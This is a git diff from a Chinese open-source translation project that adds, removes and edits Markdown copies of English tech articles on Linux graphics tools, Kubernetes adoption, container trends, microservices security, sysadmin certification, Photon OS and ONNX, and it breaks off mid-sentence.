with LibreOffice Draw. A hypothetical situation would be to take a locked IRS (or tax) form and change it to make the uneditable document editable. Imagine how much fun it could be to transform it to some humorous kind of tax form … - -And indeed, the sky’s the limit on how creative a user wants to be when using programs that are available on Linux distributions. - -![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) - -![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) - -![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) - -![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) - -![2 votes, average: 5.00 out of 5](https://www.suse.com/communities/blog/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif) - -( - - _**2** votes, average: **5.00** out of 5_ - -) - - _You need to be a registered member to rate this post._ - -Tags: [drawing][19], [Getting Started with Linux][20], [GIMP][21], [image editing][22], [Images][23], [InkScape][24], [KDE][25], [Krita][26], [Leap 42.3][27], [LibreOffice][28], [Linux Magazine][29], [Okular][30], [openSUSE][31], [PDF][32] Categories: [Desktop][33], [Expert Views][34], [LibreOffice][35], [openSUSE][36] - --------------------------------------------------------------------------------- - -via: https://www.suse.com/communities/blog/unleash-creativity-linux-programs-drawing-image-editing/ - -作者:[chabowski ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.suse.com/communities/blog/author/chabowski/ -[2]:http://www.linux-magazine.com/Resources/Special-Editions/30-Getting-Started-with-Linux -[3]:https://en.opensuse.org/Portal:42.3 -[4]:http://www.linux-magazine.com/ -[5]:https://www.gimp.org/ -[6]:https://inkscape.org/en/ -[7]:https://okular.kde.org/ -[8]:http://www.adobe.com/products/photoshop.html -[9]:http://www.adobe.com/products/illustrator.html -[10]:https://acrobat.adobe.com/us/en/acrobat/acrobat-pro-cc.html -[11]:https://krita.org/en/ -[12]:https://en.wikipedia.org/wiki/Preview_(macOS) -[13]:https://en.wikipedia.org/wiki/Microsoft_Edge -[14]:https://okular.kde.org/ -[15]:http://djvu.org/ -[16]:https://fileinfo.com/extension/chm -[17]:https://fileinfo.com/extension/xps -[18]:http://idpf.org/epub -[19]:https://www.suse.com/communities/blog/tag/drawing/ -[20]:https://www.suse.com/communities/blog/tag/getting-started-with-linux/ -[21]:https://www.suse.com/communities/blog/tag/gimp/ -[22]:https://www.suse.com/communities/blog/tag/image-editing/ -[23]:https://www.suse.com/communities/blog/tag/images/ -[24]:https://www.suse.com/communities/blog/tag/inkscape/ -[25]:https://www.suse.com/communities/blog/tag/kde/ -[26]:https://www.suse.com/communities/blog/tag/krita/ -[27]:https://www.suse.com/communities/blog/tag/leap-42-3/ -[28]:https://www.suse.com/communities/blog/tag/libreoffice/ -[29]:https://www.suse.com/communities/blog/tag/linux-magazine/ -[30]:https://www.suse.com/communities/blog/tag/okular/ -[31]:https://www.suse.com/communities/blog/tag/opensuse/ -[32]:https://www.suse.com/communities/blog/tag/pdf/ -[33]:https://www.suse.com/communities/blog/category/desktop/ -[34]:https://www.suse.com/communities/blog/category/expert-views/ -[35]:https://www.suse.com/communities/blog/category/libreoffice/ -[36]:https://www.suse.com/communities/blog/category/opensuse/ diff --git a/sources/tech/20171120 Adopting Kubernetes step by step.md b/sources/tech/20171120 Adopting Kubernetes step by step.md deleted file mode 100644 index 05faf304c8..0000000000 --- a/sources/tech/20171120 Adopting Kubernetes step by step.md +++ /dev/null @@ -1,93 +0,0 @@ -Adopting Kubernetes step by step -============================================================ - -Why Docker and Kubernetes? - -Containers allow us to build, ship and run distributed applications. They remove the machine constraints from applications and lets us create a complex application in a deterministic fashion. - -Composing applications with containers allows us to make development, QA and production environments closer to each other (if you put the effort in to get there). By doing so, changes can be shipped faster and testing a full system can happen sooner. - -[Docker][1] — the containerization platform — provides this, making software  _independent_  of cloud providers. - -However, even with containers the amount of work needed for shipping your application through any cloud provider (or in a private cloud) is significant. An application usually needs auto scaling groups, persistent remote discs, auto discovery, etc. But each cloud provider has different mechanisms for doing this. If you want to support these features, you very quickly become cloud provider dependent. - -This is where [Kubernetes][2] comes in to play. It is an orchestration system for containers that allows you to manage, scale and deploy different pieces of your application — in a standardised way — with great tooling as part of it. It’s a portable abstraction that’s compatible with the main cloud providers (Google Cloud, Amazon Web Services and Microsoft Azure all have support for Kubernetes). - -A way to visualise your application, containers and Kubernetes is to think about your application as a shark — stay with me — that exists in the ocean (in this example, the ocean is your machine). The ocean may have other precious things you don’t want your shark to interact with, like [clown fish][3]. So you move you shark (your application) into a sealed aquarium (Container). This is great but not very robust. Your aquarium can break or maybe you want to build a tunnel to another aquarium where other fish live. Or maybe you want many copies of that aquarium in case one needs cleaning or maintenance… this is where Kubernetes clusters come to play. - - -![](https://cdn-images-1.medium.com/max/1600/1*OVt8cnY1WWOqdLFycCgdFg.jpeg) -Evolution to Kubernetes - -With Kubernetes being supported by the main cloud providers, it makes it easier for you and your team to have environments from  _development _ to  _production _ that are almost identical to each other. This is because Kubernetes has no reliance on proprietary software, services or infrastructure. - -The fact that you can start your application in your machine with the same pieces as in production closes the gaps between a development and a production environment. This makes developers more aware of how an application is structured together even though they might only be responsible for one piece of it. It also makes it easier for your application to be fully tested earlier in the pipeline. - -How do you work with Kubernetes? - -With more people adopting Kubernetes new questions arise; how should I develop against a cluster based environment? Suppose you have 3 environments — development, QA and production — how do I fit Kubernetes in them? Differences across these environments will still exist, either in terms of development cycle (e.g. time spent to see my code changes in the application I’m running) or in terms of data (e.g. I probably shouldn’t test with production data in my QA environment as it has sensitive information). - -So, should I always try to work inside a Kubernetes cluster, building images, recreating deployments and services while I code? Or maybe I should not try too hard to make my development environment be a Kubernetes cluster (or set of clusters) in development? Or maybe I should work in a hybrid way? - - -![](https://cdn-images-1.medium.com/max/1600/1*MXokxD8Ktte4_vWvTas9uw.jpeg) -Development with a local cluster - -If we carry on with our metaphor, the holes on the side represent a way to make changes to our app while keeping it in a development cluster. This is usually achieved via [volumes][4]. - -A Kubernetes series - -The Kubernetes series repository is open source and available here: - -### [https://github.com/red-gate/ks][5] - -We’ve written this series as we experiment with different ways to build software. We’ve tried to constrain ourselves to use Kubernetes in all environments so that we can explore the impact these technologies will have on the development and management of data and the database. - -The series starts with the basic creation of a React application hooked up to Kubernetes, and evolves to encompass more of our development requirements. By the end we’ll have covered all of our application development needs  _and_  have understood how best to cater for the database lifecycle in this world of containers and clusters. - -Here are the first 5 episodes of this series: - -1. ks1: build a React app with Kubernetes - -2. ks2: make minikube detect React code changes - -3. ks3: add a python web server that hosts an API - -4. ks4: make minikube detect Python code changes - -5. ks5: create a test environment - -The second part of the series will add a database and try to work out the best way to evolve our application alongside it. - -By running Kubernetes in all environments, we’ve been forced to solve new problems as we try to keep the development cycle as fast as possible. The trade-off being that we are constantly exposed to Kubernetes and become more accustomed to it. By doing so, development teams become responsible for production environments, which is no longer difficult as all environments (development through production) are all managed in the same way. - -What’s next? - -We will continue this series by incorporating a database and experimenting to find the best way to have a seamless database lifecycle experience with Kubernetes. - - _This Kubernetes series is brought to you by Foundry, Redgate’s R&D division. We’re working on making it easier to manage data alongside containerised environments, so if you’re working with data and containerised environments, we’d like to hear from you — reach out directly to the development team at _ [_foundry@red-gate.com_][6] - -* * * - - _We’re hiring_ _. Are you interested in uncovering product opportunities, building _ [_future technology_][7] _ and taking a startup-like approach (without the risk)? Take a look at our _ [_Software Engineer — Future Technologies_][8] _ role and read more about what it’s like to work at Redgate in _ [_Cambridge, UK_][9] _._ - --------------------------------------------------------------------------------- - -via: https://medium.com/ingeniouslysimple/adopting-kubernetes-step-by-step-f93093c13dfe - -作者:[santiago arias][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://medium.com/@santiaago?source=post_header_lockup -[1]:https://www.docker.com/what-docker -[2]:https://kubernetes.io/ -[3]:https://www.google.co.uk/search?biw=723&bih=753&tbm=isch&sa=1&ei=p-YCWpbtN8atkwWc8ZyQAQ&q=nemo+fish&oq=nemo+fish&gs_l=psy-ab.3..0i67k1l2j0l2j0i67k1j0l5.5128.9271.0.9566.9.9.0.0.0.0.81.532.9.9.0....0...1.1.64.psy-ab..0.9.526...0i7i30k1j0i7i10i30k1j0i13k1j0i10k1.0.FbAf9xXxTEM -[4]:https://kubernetes.io/docs/concepts/storage/volumes/ -[5]:https://github.com/red-gate/ks -[6]:mailto:foundry@red-gate.com -[7]:https://www.red-gate.com/foundry/ -[8]:https://www.red-gate.com/our-company/careers/current-opportunities/software-engineer-future-technologies -[9]:https://www.red-gate.com/our-company/careers/living-in-cambridge diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md new file mode 100644 index 0000000000..b73ccb21c2 --- /dev/null +++ b/sources/tech/20171120 Containers and Kubernetes Whats next.md @@ -0,0 +1,98 @@ +YunfengHe Translating +Containers and Kubernetes: What's next? +============================================================ + +### What's ahead for container orchestration and Kubernetes? Here's an expert peek + +![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") + +If you want a basic idea of where containers are headed in the near future, follow the money. There’s a lot of it: 451 Research projects that the overall market for containers will hit roughly [$2.7 billion in 2020][4], a 3.5-fold increase from the $762 million spent on container-related technology in 2016. + +There’s an obvious fundamental factor behind such big numbers: Rapidly increasing containerization. The parallel trend: As container adoption grows, so will container  _orchestration_  adoption. + +As recent survey data from  [_The New Stack_][5]  indicates, container adoption is the most significant catalyst of orchestration adoption: 60 percent of respondents who’ve deployed containers broadly in production report they’re also using Kubernetes widely in production. Another 19 percent of respondents with broad container deployments in production were in the initial stages of broad Kubernetes adoption. Meanwhile, just 5 percent of those in the initial phases of deploying containers in production environments were using Kubernetes broadly – but 58 percent said they were preparing to do so. It’s a chicken-and-egg relationship. + + +Most experts agree that an orchestration tool is essential to the scalable [long-term management of containers][6] – and corresponding developments in the marketplace. “The next trends in container orchestration are all focused on broadening adoption,” says Alex Robinson, software engineer at [Cockroach Labs][7]. + +This is a quickly shifting landscape, one that is just starting to realize its future potential. So we checked in with Robinson and other practitioners to get their boots-on-the-ground perspective on what’s next in container orchestration – and for Kubernetes itself. + +### **Container orchestration shifts to mainstream** + +We’re at the precipice common to most major technology shifts, where we transition from the careful steps of early adoption to cliff-diving into commonplace use. That will create new demand for the plain-vanilla requirements that make mainstream adoption easier, especially in large enterprises. + +“The gold rush phase of early innovation has slowed down and given way to a much stronger focus on stability and usability,” Robinson says. “This means we'll see fewer major announcements of new orchestration systems, and more security options, management tools, and features that make it easier to take advantage of the flexibility already inherent in the major orchestration systems.” + +### **Reduced complexity** + +On a related front, expect an intensifying effort to cut back on the complexity that some organizations face when taking their first plunge into container orchestration. As we’ve covered before, deploying a container might be “easy,” but [managing containers long-term ][8]requires more care. + +“Today, container orchestration is too complex for many users to take full advantage,” says My Karlsson, developer at [Codemill AB][9]. “New users are often struggling just to get single or small-size container configurations running in isolation, especially when applications are not originally designed for it. There are plenty of opportunities to simplify the orchestration of non-trivial applications and make the technology more accessible.” + +### **Increasing focus on hybrid cloud and multi-cloud** + +As adoption of containers and container orchestration grows, more organizations will scale from a starting point of, say, running non-critical workloads in a single environment to more [complex use cases][10] across multiple environments. For many companies, that will mean managing containerized applications (and particularly containerized microservices) across [hybrid cloud][11] and [multi-cloud][12] environments, often globally. + +"Containers and Kubernetes have made hybrid cloud and application portability a reality,” says [Brian Gracely][13], director of [Red Hat][14] OpenShift product strategy. “Combined with the Open Service Broker, we expect to see an explosion of new applications that combine private and public cloud resources." + +“I believe that federation will get a push, enabling much-wanted features such as seamless multi-region and multi-cloud deployments,” says Carlos Sanchez, senior software engineer at [CloudBees][15].  + +**[ Want CIO wisdom on hybrid cloud and multi-cloud strategy? See our related resource, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** + +### **Continued consolidation of platforms and tools** + +Technology consolidation is common trend; container orchestration is no exception. + +“As containerization goes mainstream, engineers are consolidating on a very small number of technologies to run their [microservices and] containers and Kubernetes will become the dominant container orchestration platform, far outstripping other platforms,” says Ben Newton, analytics lead at [Sumo Logic][17]. “Companies will adopt Kubernetes to drive a cloud-neutral approach as Kubernetes provides a reasonably clear path to reduce dependence on [specific] cloud ecosystems.**”** + +### **Speaking of Kubernetes, what’s next?** + +"Kubernetes is here for the long haul, and the community driving it is doing great job – but there's lots ahead,” says Gadi Naor, CTO and co-founder of [Alcide][18]. Our experts shared several predictions specific to [the increasingly popular Kubernetes platform][19]:  + + **_Gadi Naor at Alcide:_**  “Operators will continue to evolve and mature, to a point where applications running on Kubernetes will become fully self-managed. Deploying and monitoring microservices on top of Kubernetes with [OpenTracing][20] and service mesh frameworks such as [istio][21] will help shape new possibilities.” + + **_Brian Gracely at Red Hat:_**  “Kubernetes continues to expand in terms of the types of applications it can support. When you can run traditional applications, cloud-native applications, big data applications, and HPC or GPU-centric applications on the same platform, it unlocks a ton of architectural flexibility.” + + **_Ben Newton at Sumo Logic: _ “**As Kubernetes becomes more dominant, I would expect to see more normalization of the operational mechanisms – particularly integrations into third-party management and monitoring platforms.” + + **_Carlos Sanchez at CloudBees: _** “In the immediate future there is the ability to run without Docker, using other runtimes...to remove any lock-in. [Editor’s note: [CRI-O][22], for example, offers this ability.] “Also, [look for] storage improvements to support enterprise features like data snapshotting and online volume resizing.” + + + **_Alex Robinson at Cockroach Labs: _ “**One of the bigger developments happening in the Kubernetes community right now is the increased focus on managing [stateful applications][23]. Managing state in Kubernetes right now is very difficult if you aren't running in a cloud that offers remote persistent disks, but there's work being done on multiple fronts [both inside Kubernetes and by external vendors] to improve this.” + +-------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next + +作者:[Kevin Casey ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/kevin-casey +[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats +[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity +[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ +[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf +[5]:https://thenewstack.io/ +[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[7]:https://www.cockroachlabs.com/ +[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[9]:https://codemill.se/ +[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA +[11]:https://enterprisersproject.com/hybrid-cloud +[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference +[13]:https://enterprisersproject.com/user/brian-gracely +[14]:https://www.redhat.com/en +[15]:https://www.cloudbees.com/ +[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ +[17]:https://www.sumologic.com/ +[18]:http://alcide.io/ +[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english +[20]:http://opentracing.io/ +[21]:https://istio.io/ +[22]:http://cri-o.io/ +[23]:https://opensource.com/article/17/2/stateful-applications +[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 +[25]:https://enterprisersproject.com/user/kevin-casey diff --git a/sources/tech/20171123 Why microservices are a security issue.md b/sources/tech/20171123 Why microservices are a security issue.md deleted file mode 100644 index d5868faa9e..0000000000 --- a/sources/tech/20171123 Why microservices are a security issue.md +++ /dev/null @@ -1,116 +0,0 @@ -Why microservices are a security issue -============================================================ - -### Maybe you don't want to decompose all your legacy applications into microservices, but you might consider starting with your security functions. - -![Why microservices are a security issue](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/rh_003601_05_mech_osyearbook2016_security_cc.png?itok=3V07Lpko "Why microservices are a security issue") -Image by : Opensource.com - -I struggled with writing the title for this post, and I worry that it comes across as clickbait. If you've come to read this because it looked like clickbait, then sorry.[1][5]I hope you'll stay anyway: there are lots of fascinating[2][6] points and many[3][7]footnotes. What I  _didn't_  mean to suggest is that microservices cause [security][15]problems—though like any component, of course, they can—but that microservices are appropriate objects of interest to those involved with security. I'd go further than that: I think they are an excellent architectural construct for those concerned with security. - -And why is that? Well, for those of us with a [systems security][16] bent, the world is an interesting place at the moment. We're seeing a growth in distributed systems, as bandwidth is cheap and latency low. Add to this the ease of deploying to the cloud, and more architects are beginning to realise that they can break up applications, not just into multiple layers, but also into multiple components within the layer. Load balancers, of course, help with this when the various components in a layer are performing the same job, but the ability to expose different services as small components has led to a growth in the design, implementation, and deployment of  _microservices_ . - -More on Microservices - -* [How to explain microservices to your CEO][1] - -* [Free eBook: Microservices vs. service-oriented architecture][2] - -* [Secured DevOps for microservices][3] - -So, [what exactly is a microservice][23]? I quite like [Wikipedia's definition][24], though it's interesting that security isn't mentioned there.[4][17] One of the points that I like about microservices is that, when well-designed, they conform to the first two points of Peter H. Salus' description of the [Unix philosophy][25]: - -1. Write programs that do one thing and do it well. - -2. Write programs to work together. - -3. Write programs to handle text streams, because that is a universal interface. - -The last of the three is slightly less relevant, because the Unix philosophy is generally used to refer to standalone applications, which often have a command instantiation. It does, however, encapsulate one of the basic requirements of microservices: that they must have well-defined interfaces. - -By "well-defined," I don't just mean a description of any externally accessible APIs' methods, but also of the normal operation of the microservice: inputs and outputs—and, if there are any, side-effects. As I described in a previous post, "[5 traits of good systems architecture][18]," data and entity descriptions are crucial if you're going to be able to design a system. Here, in our description of microservices, we get to see why these are so important, because, for me, the key defining feature of a microservices architecture is decomposability. And if you're going to decompose[5][8] your architecture, you need to be very, very clear which "bits" (components) are going to do what. - -And here's where security starts to come in. A clear description of what a particular component should be doing allows you to: - -* Check your design - -* Ensure that your implementation meets the description - -* Come up with reusable unit tests to check functionality - -* Track mistakes in implementation and correct them - -* Test for unexpected outcomes - -* Monitor for misbehaviour - -* Audit actual behaviour for future scrutiny - -Now, are all these things possible in a larger architecture? Yes, they are. But they become increasingly difficult where entities are chained together or combined in more complex configurations. Ensuring  _correct_  implementation and behaviour is much, much easier when you've got smaller pieces to work together. And deriving complex systems behaviours—and misbehaviours—is much more difficult if you can't be sure that the individual components are doing what they ought to be. - -It doesn't stop here, however. As I've mentioned on many [previous occasions][19], writing good security code is difficult.[7][9] Proving that it does what it should do is even more difficult. There is every reason, therefore, to restrict code that has particular security requirements—password checking, encryption, cryptographic key management, authorisation, etc.—to small, well-defined blocks. You can then do all the things that I've mentioned above to try to make sure it's done correctly. - -And yet there's more. We all know that not everybody is great at writing security-related code. By decomposing your architecture such that all security-sensitive code is restricted to well-defined components, you get the chance to put your best security people on that and restrict the danger that J. Random Coder[8][10] will put something in that bypasses or downgrades a key security control. - -It can also act as an opportunity for learning: It's always good to be able to point to a design/implementation/test/monitoring tuple and say: "That's how it should be done. Hear, read, mark, learn, and inwardly digest.[9][11]" - -Should you go about decomposing all of your legacy applications into microservices? Probably not. But given all the benefits you can accrue, you might consider starting with your security functions. - -* * * - -1Well, a little bit—it's always nice to have readers. - -2I know they are: I wrote them. - -3Probably less fascinating. - -4At the time this article was written. It's entirely possible that I—or one of you—may edit the article to change that. - -5This sounds like a gardening term, which is interesting. Not that I really like gardening, but still.[6][12] - -6Amusingly, I first wrote, "…if you're going to decompose your architect…," which sounds like the strapline for an IT-themed murder film. - -7Regular readers may remember a reference to the excellent film  _The Thick of It_ . - -8Other generic personae exist; please take your pick. - -9Not a cryptographic digest: I don't think that's what the original writers had in mind. - - _This article originally appeared on [Alice, Eve, and Bob—a security blog][13] and is republished with permission._ - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/microservices-are-security-issue - -作者:[Mike Bursell ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/mikecamel -[1]:https://blog.openshift.com/microservices-how-to-explain-them-to-your-ceo/?intcmp=7016000000127cYAAQ&src=microservices_resource_menu1 -[2]:https://www.openshift.com/promotions/microservices.html?intcmp=7016000000127cYAAQ&src=microservices_resource_menu2 -[3]:https://opensource.com/business/16/11/secured-devops-microservices?src=microservices_resource_menu3 -[4]:https://opensource.com/article/17/11/microservices-are-security-issue?rate=GDH4xOWsgYsVnWbjEIoAcT_92b8gum8XmgR6U0T04oM -[5]:https://opensource.com/article/17/11/microservices-are-security-issue#1 -[6]:https://opensource.com/article/17/11/microservices-are-security-issue#2 -[7]:https://opensource.com/article/17/11/microservices-are-security-issue#3 -[8]:https://opensource.com/article/17/11/microservices-are-security-issue#5 -[9]:https://opensource.com/article/17/11/microservices-are-security-issue#7 -[10]:https://opensource.com/article/17/11/microservices-are-security-issue#8 -[11]:https://opensource.com/article/17/11/microservices-are-security-issue#9 -[12]:https://opensource.com/article/17/11/microservices-are-security-issue#6 -[13]:https://aliceevebob.com/2017/10/31/why-microservices-are-a-security-issue/ -[14]:https://opensource.com/user/105961/feed -[15]:https://opensource.com/tags/security -[16]:https://aliceevebob.com/2017/03/14/systems-security-why-it-matters/ -[17]:https://opensource.com/article/17/11/microservices-are-security-issue#4 -[18]:https://opensource.com/article/17/10/systems-architect -[19]:https://opensource.com/users/mikecamel -[20]:https://opensource.com/users/mikecamel -[21]:https://opensource.com/users/mikecamel -[22]:https://opensource.com/article/17/11/microservices-are-security-issue#comments -[23]:https://opensource.com/resources/what-are-microservices -[24]:https://en.wikipedia.org/wiki/Microservices -[25]:https://en.wikipedia.org/wiki/Unix_philosophy diff --git a/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md new file mode 100644 index 0000000000..27379cbe40 --- /dev/null +++ b/sources/tech/20171124 Open Source Cloud Skills and Certification Are Key for SysAdmins.md @@ -0,0 +1,70 @@ +translating by wangy325... + + +Open Source Cloud Skills and Certification Are Key for SysAdmins +============================================================ + + +![os jobs](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/open-house-sysadmin.jpg?itok=i5FHc3lu "os jobs") +Sysadmins with open source skills and certification can command higher pay, according to the 2017 Open Source Jobs Report.[Creative Commons Zero][1] + +System administrator is one of the most common positions employers are looking to fill among 53 percent of respondents to the [2017 Open Source Jobs Report][3]. Consequently, sysadmins with skills in engineering can command higher salaries, as these positions are among the hardest to fill, the report finds. + +Sysadmins are generally responsible for installing, supporting, and maintaining servers or other computer systems, and planning for and responding to service outages and other problems. + +Overall, this year’s report finds the skills most in demand are open source cloud (47 percent), application development (44 percent), Big Data (43 percent) and both DevOps and security (42 percent). + +The report also finds that 58 percent of hiring managers are planning to hire more open source professionals, and 67 percent say hiring of open source professionals will increase more than in other areas of the business. This represents a two-point increase over last year among employers who said open source hiring would be their top field of recruitment. + +At the same time, 89 percent of hiring managers report it is difficult to find open source talent. + +### Why get certified + +The desire for sysadmins is incentivizing hiring managers to offer formal training and/or certifications in the discipline in 53 percent of organizations, compared to 47 percent last year, the Open Source Jobs Report finds. + +IT professionals interested in sysadmin positions should consider Linux certifications. Searches on several of the more well-known job posting sites reveal that the [CompTIA Linux+][4]certification is the top certification for entry-level Linux sysadmin, while [Red Hat Certified Engineer (RHCE)][5] and [Red Hat Certified System Administrator (RHCSA)][6] are the main certifications for higher-level positions. + +In 2016, a sysadmin commanded a salary of $79,583, a change of -0.8 percent from the previous year, according to Dice’s [2017 Tech Salary Survey][7]. The systems architect position paid $125,946, a year-over-year change of -4.7 percent. Yet, the survey observes that “Highly skilled technology professionals remain in the most demand, especially those candidates proficient in the technologies needed to support industry transformation and growth.” + +When it comes to open source skills, HBase (an open-source distributed database), ranked as one that garners among the highest pay for tech pros in the Dice survey. In the networking and database category, the OpenVMS operating system ranked as another high-paying skill. + +### The sysadmin role + +One of a sysadmin’s responsibilities is to be available 24/7 when a problem occurs. The position calls for a mindset that is about “zero-blame, lean, iterative improvement in process or technology,’’ and one that is open to change, writes Paul English, a board member for the League of Professional System Administrators, a non-profit professional association for the advancement of the practice of system administration, in  [opensource.com][8]. He adds that being a sysadmin means “it’s almost a foregone conclusion that you’ll work with open source software like Linux, BSD, and even open source Solaris.” + +Today’s sysadmins will more often work with software rather than hardware, and should be prepared to write small scripts, according to English. + +### Outlook for 2018 + +Expect to see sysadmins among the tech professionals many employers in North America will be hiring in 2018, according to [Robert Half’s 2018 Salary Guide for Technology Professionals][9]. Increasingly, soft skills and leadership qualities are also highly valued. + +“Good listening and critical-thinking skills, which are essential to understanding and resolving customers’ issues and concerns, are important for almost any IT role today, but especially for help desk and desktop support professionals,’’ the report states. + +This jibes with some of the essential skills needed at various stages of the sysadmin position, including strong analytical skills and an ability to solve problems quickly, according to [The Linux Foundation][10]. + +Other skills sysadmins should have as they move up the ladder are: interest in structured approaches to system configuration management; experience in resolving security issues; experience with user identity management; ability to communicate in non-technical terms to non-technical people; and ability to modify system to meet new security requirements. + + _[Download ][11]the full 2017 Open Source Jobs Report now._ + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/blog/open-source-cloud-skills-and-certification-are-key-sysadmins + +作者:[ ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: +[1]:https://www.linux.com/licenses/category/creative-commons-zero +[2]:https://www.linux.com/files/images/open-house-sysadminjpg +[3]:https://www.linuxfoundation.org/blog/2017-jobs-report-highlights-demand-open-source-skills/ +[4]:https://certification.comptia.org/certifications/linux?tracking=getCertified/certifications/linux.aspx +[5]:https://www.redhat.com/en/services/certification/rhce +[6]:https://www.redhat.com/en/services/certification/rhcsa +[7]:http://marketing.dice.com/pdf/Dice_TechSalarySurvey_2017.pdf?aliId=105832232 +[8]:https://opensource.com/article/17/7/truth-about-sysadmins +[9]:https://www.roberthalf.com/salary-guide/technology +[10]:https://www.linux.com/learn/10-essential-skills-novice-junior-and-senior-sysadmins%20%20 +[11]:http://bit.ly/2017OSSjobsreport diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md index d282ef5445..147a2266cc 100644 --- a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md +++ b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -1,6 +1,9 @@ +KeyLD Translating + Photon Could Be Your New Favorite Container OS ============================================================ + ![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") Jack Wallen says Photon OS is an outstanding platform, geared specifically for containers.[Creative Commons Zero][5]Pixabay @@ -106,9 +109,9 @@ Give Photon a try and see if it doesn’t make deploying Docker containers and/o -------------------------------------------------------------------------------- -via: 网址 +via: https://www.linux.com/learn/intro-to-linux/2017/11/photon-could-be-your-new-favorite-container-os -作者:[ JACK WALLEN][a] +作者:[JACK WALLEN ][a] 译者:[译者ID](https://github.com/译者ID) 校对:[校对者ID](https://github.com/校对者ID) diff --git a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md b/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md deleted file mode 100644 index c09d66bc57..0000000000 --- a/sources/tech/20171125 AWS to Help Build ONNX Open Source AI Platform.md +++ /dev/null @@ -1,76 +0,0 @@ -AWS to Help Build ONNX Open Source AI Platform -============================================================ -![onnx-open-source-ai-platform](https://www.linuxinsider.com/article_images/story_graphics_xlarge/xl-2017-onnx-1.jpg) - - -Amazon Web Services has become the latest tech firm to join the deep learning community's collaboration on the Open Neural Network Exchange, recently launched to advance artificial intelligence in a frictionless and interoperable environment. Facebook and Microsoft led the effort. - -As part of that collaboration, AWS made its open source Python package, ONNX-MxNet, available as a deep learning framework that offers application programming interfaces across multiple languages including Python, Scala and open source statistics software R. - -The ONNX format will help developers build and train models for other frameworks, including PyTorch, Microsoft Cognitive Toolkit or Caffe2, AWS Deep Learning Engineering Manager Hagay Lupesko and Software Developer Roshani Nagmote wrote in an online post last week. It will let developers import those models into MXNet, and run them for inference. - -### Help for Developers - -Facebook and Microsoft this summer launched ONNX to support a shared model of interoperability for the advancement of AI. Microsoft committed its Cognitive Toolkit, Caffe2 and PyTorch to support ONNX. - -Cognitive Toolkit and other frameworks make it easier for developers to construct and run computational graphs that represent neural networks, Microsoft said. - -Initial versions of [ONNX code and documentation][4] were made available on Github. - -AWS and Microsoft last month announced plans for Gluon, a new interface in Apache MXNet that allows developers to build and train deep learning models. - -Gluon "is an extension of their partnership where they are trying to compete with Google's Tensorflow," observed Aditya Kaul, research director at [Tractica][5]. - -"Google's omission from this is quite telling but also speaks to their dominance in the market," he told LinuxInsider. - -"Even Tensorflow is open source, and so open source is not the big catch here 